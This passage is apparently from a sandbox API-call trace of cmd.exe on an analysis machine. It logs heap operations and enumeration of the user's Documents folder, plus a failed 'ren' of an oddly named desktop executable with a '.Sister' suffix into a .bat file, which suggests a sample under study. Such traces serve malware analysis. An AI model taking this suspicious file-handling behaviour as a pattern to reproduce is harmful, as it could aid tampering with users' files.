dwFlags=0x2) returned 1 [0304.827] FindNextFileW (in: hFindFile=0x21ed8cc71e0, lpFindFileData=0x21ed8d5aa10 | out: lpFindFileData=0x21ed8d5aa10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc83b6e0, ftCreationTime.dwHighDateTime=0x1d5ec38, ftLastAccessTime.dwLowDateTime=0x347005e0, ftLastAccessTime.dwHighDateTime=0x1d5e5d1, ftLastWriteTime.dwLowDateTime=0x347005e0, ftLastWriteTime.dwHighDateTime=0x1d5e5d1, nFileSizeHigh=0x0, nFileSizeLow=0x7ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="mC1AJ.doc", cAlternateFileName="")) returned 0 [0304.829] GetLastError () returned 0x12 [0304.829] FindClose (in: hFindFile=0x21ed8cc71e0 | out: hFindFile=0x21ed8cc71e0) returned 1 [0304.829] ??_V@YAXPEAX@Z () returned 0x1 [0304.829] ??_V@YAXPEAX@Z () returned 0x1 [0304.829] ??_V@YAXPEAX@Z () returned 0x1 [0304.829] ??_V@YAXPEAX@Z () returned 0x1 [0304.829] GetProcessHeap () returned 0x21ed8c70000 [0304.829] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7780 [0304.829] GetProcessHeap () returned 0x21ed8c70000 [0304.829] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95820, Size=0x16) returned 0x21ed8c95680 [0304.829] GetProcessHeap () returned 0x21ed8c70000 [0304.829] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95680) returned 0x16 [0304.829] GetProcessHeap () returned 0x21ed8c70000 [0304.829] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45cb0, Size=0x20) returned 0x21ed8d45bf0 [0304.829] GetProcessHeap () returned 0x21ed8c70000 [0304.829] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45bf0) returned 0x20 [0304.829] GetProcessHeap () returned 0x21ed8c70000 [0304.829] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d61d40 [0304.829] GetProcessHeap () returned 0x21ed8c70000 [0304.829] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61d40, Size=0xb2) returned 0x21ed93b4ef0 [0304.830] GetProcessHeap () returned 0x21ed8c70000 [0304.830] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b4ef0) returned 0xb2 [0304.830] GetProcessHeap () returned 0x21ed8c70000 [0304.830] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2abe0 [0304.830] GetProcessHeap () returned 0x21ed8c70000 [0304.830] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2abe0, Size=0x30) returned 0x21ed8d2abe0 [0304.830] GetProcessHeap () returned 0x21ed8c70000 [0304.830] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2abe0) returned 0x30 [0304.830] GetProcessHeap () returned 0x21ed8c70000 [0304.830] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2ac20 [0304.830] malloc (_Size=0x1ff9c) returned 0x21eda1ffe00 [0304.831] GetProcessHeap () returned 0x21ed8c70000 [0304.831] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b5f70 [0304.831] GetProcessHeap () returned 0x21ed8c70000 [0304.831] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed93b5a30 [0304.831] ??_V@YAXPEAX@Z () returned 0x1 [0304.831] malloc (_Size=0x1ff9c) returned 0x21eda1ffe00 [0304.831] GetProcessHeap () returned 0x21ed8c70000 [0304.831] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b63f0 [0304.831] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda1ffe00, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0304.831] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7c60 [0304.831] FindClose (in: hFindFile=0x21ed8cc7c60 | out: hFindFile=0x21ed8cc7c60) returned 1 [0304.831] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7720 [0304.832] FindClose (in: hFindFile=0x21ed8cc7720 | out: hFindFile=0x21ed8cc7720) returned 1 [0304.832] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc7d20 [0304.832] FindClose (in: hFindFile=0x21ed8cc7d20 | out: hFindFile=0x21ed8cc7d20) returned 1 [0304.832] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0304.832] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.832] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0304.833] GetProcessHeap () returned 0x21ed8c70000 [0304.834] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d678b0 [0304.834] ??_V@YAXPEAX@Z () returned 0x1 [0304.834] ??_V@YAXPEAX@Z () returned 0x1 [0304.834] GetProcessHeap () returned 0x21ed8c70000 [0304.834] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2ac20, Size=0x490) returned 0x21ed8d2ac20 [0304.834] GetProcessHeap () returned 0x21ed8c70000 [0304.834] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2ac20) returned 0x490 [0304.834] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0304.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.834] GetFileType (hFile=0x50) returned 0x2 [0304.834] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.834] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0304.834] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.834] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0304.840] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.840] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0304.840] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0304.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.841] GetFileType (hFile=0x50) returned 0x2 [0304.841] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.841] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0304.841] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.841] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0304.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.842] GetFileType (hFile=0x50) returned 0x2 [0304.842] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.842] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0304.842] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.842] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2abf0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d2abf0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0304.843] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0304.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.843] GetFileType (hFile=0x50) returned 0x2 [0304.843] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.843] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0304.843] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.843] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0304.852] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0304.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.852] GetFileType (hFile=0x50) returned 0x2 [0304.852] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.852] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0304.852] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.852] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0304.856] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0304.856] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0304.872] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0304.873] malloc (_Size=0xffce) returned 0x21eda1ffe00 [0304.873] ??_V@YAXPEAX@Z () returned 0x21eda1ffe00 [0304.873] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0304.873] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0304.873] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0304.873] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0304.873] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0304.873] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0304.873] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0304.873] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0304.873] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0304.873] ??_V@YAXPEAX@Z () returned 0x1 [0304.873] GetProcessHeap () returned 0x21ed8c70000 [0304.873] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f720 [0304.874] GetProcessHeap () returned 0x21ed8c70000 [0304.874] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f720, Size=0x130) returned 0x21ed93b2970 [0304.874] GetProcessHeap () returned 0x21ed8c70000 [0304.874] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b2970) returned 0x130 [0304.874] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0304.874] malloc (_Size=0xffce) returned 0x21eda1ffe00 [0304.874] ??_V@YAXPEAX@Z () returned 0x21eda1ffe00 [0304.874] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0304.874] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda1ffe00, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0304.876] ??_V@YAXPEAX@Z () returned 0x1 [0304.876] GetProcessHeap () returned 0x21ed8c70000 [0304.876] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed93b2ab0 [0304.876] GetProcessHeap () returned 0x21ed8c70000 [0304.876] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f980 [0304.876] GetProcessHeap () returned 0x21ed8c70000 [0304.876] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f980, Size=0x130) returned 0x21ed93b16b0 [0304.876] GetProcessHeap () returned 0x21ed8c70000 [0304.876] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b16b0) returned 0x130 [0304.876] malloc (_Size=0xffce) returned 0x21eda1ffe00 [0304.876] ??_V@YAXPEAX@Z () returned 0x21eda1ffe00 [0304.876] GetProcessHeap () returned 0x21ed8c70000 [0304.876] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7840 [0304.877] GetProcessHeap () returned 0x21ed8c70000 [0304.877] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5b150 [0304.877] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0304.877] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0304.877] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.877] GetLastError () returned 0x2 [0304.877] GetProcessHeap () returned 0x21ed8c70000 [0304.877] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92e0020 [0304.877] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed92e0030 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.877] SetErrorMode (uMode=0x0) returned 0x0 [0304.877] SetErrorMode (uMode=0x1) returned 0x0 [0304.877] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda1ffe00, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0304.877] SetErrorMode (uMode=0x0) returned 0x1 [0304.877] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0304.878] GetProcessHeap () returned 0x21ed8c70000 [0304.878] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d598f0 [0304.878] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0304.878] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0304.878] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.878] GetLastError () returned 0x2 [0304.878] ??_V@YAXPEAX@Z () returned 0x1 [0304.878] malloc (_Size=0xffce) returned 0x21eda1ffe00 [0304.878] ??_V@YAXPEAX@Z () returned 0x21eda1ffe00 [0304.878] malloc (_Size=0xffce) returned 0x21eda20fde0 [0304.878] ??_V@YAXPEAX@Z () returned 0x21eda20fde0 [0304.878] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.878] GetLastError () returned 0x2 [0304.878] _get_osfhandle (_FileHandle=2) returned 0x54 [0304.878] GetFileType (hFile=0x54) returned 0x2 [0304.878] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0304.878] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0304.883] _get_osfhandle (_FileHandle=2) returned 0x54 [0304.883] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0304.884] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0304.884] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0304.884] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0304.890] longjmp () [0304.890] ??_V@YAXPEAX@Z () returned 0x1 [0304.890] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="My Music", cAlternateFileName="")) returned 1 [0304.891] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="My Pictures", cAlternateFileName="")) returned 1 [0304.891] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="My Shapes", cAlternateFileName="")) returned 1 [0304.891] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="My Videos", cAlternateFileName="")) returned 1 [0304.891] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaccf30, ftCreationTime.dwHighDateTime=0x1d56990, ftLastAccessTime.dwLowDateTime=0xdb8ed1b0, ftLastAccessTime.dwHighDateTime=0x1d56da1, ftLastWriteTime.dwLowDateTime=0xdb8ed1b0, ftLastWriteTime.dwHighDateTime=0x1d56da1, nFileSizeHigh=0x0, nFileSizeLow=0x18e16, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="N8giE.docx", cAlternateFileName="")) returned 1 [0304.891] GetProcessHeap () returned 0x21ed8c70000 [0304.891] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x16a) returned 0x21ed8c758a0 [0304.891] GetProcessHeap () returned 0x21ed8c70000 [0304.891] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x16a [0304.891] GetProcessHeap () returned 0x21ed8c70000 [0304.891] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2b0c0 [0304.891] GetProcessHeap () returned 0x21ed8c70000 [0304.891] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2b0c0, Size=0x30) returned 0x21ed8d2b0c0 [0304.891] GetProcessHeap () returned 0x21ed8c70000 [0304.891] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2b0c0) returned 0x30 [0304.891] GetProcessHeap () returned 0x21ed8c70000 [0304.891] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2b100 [0304.892] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.892] GetProcessHeap () returned 0x21ed8c70000 [0304.892] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x26) returned 0x21ed8d45c20 [0304.892] ??_V@YAXPEAX@Z () returned 0x1 [0304.892] GetProcessHeap () returned 0x21ed8c70000 [0304.892] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2b100, Size=0x120) returned 0x21ed8d2b100 [0304.892] GetProcessHeap () returned 0x21ed8c70000 [0304.892] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2b100) returned 0x120 [0304.892] GetProcessHeap () returned 0x21ed8c70000 [0304.892] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2b230 [0304.892] GetProcessHeap () returned 0x21ed8c70000 [0304.892] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2b230, Size=0x290) returned 0x21ed8d2b230 [0304.892] GetProcessHeap () returned 0x21ed8c70000 [0304.892] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2b230) returned 0x290 [0304.892] GetProcessHeap () returned 0x21ed8c70000 [0304.892] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2b4d0 [0304.892] GetProcessHeap () returned 0x21ed8c70000 [0304.892] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2b4d0, Size=0x30) returned 0x21ed8d2b4d0 [0304.892] GetProcessHeap () returned 0x21ed8c70000 [0304.892] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2b4d0) returned 0x30 [0304.892] GetProcessHeap () returned 0x21ed8c70000 [0304.892] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2b510 [0304.892] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.893] GetProcessHeap () returned 0x21ed8c70000 [0304.893] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x26) returned 0x21ed8d45cb0 [0304.893] ??_V@YAXPEAX@Z () returned 0x1 [0304.893] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.893] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7180 [0304.893] FindClose (in: hFindFile=0x21ed8cc7180 | out: 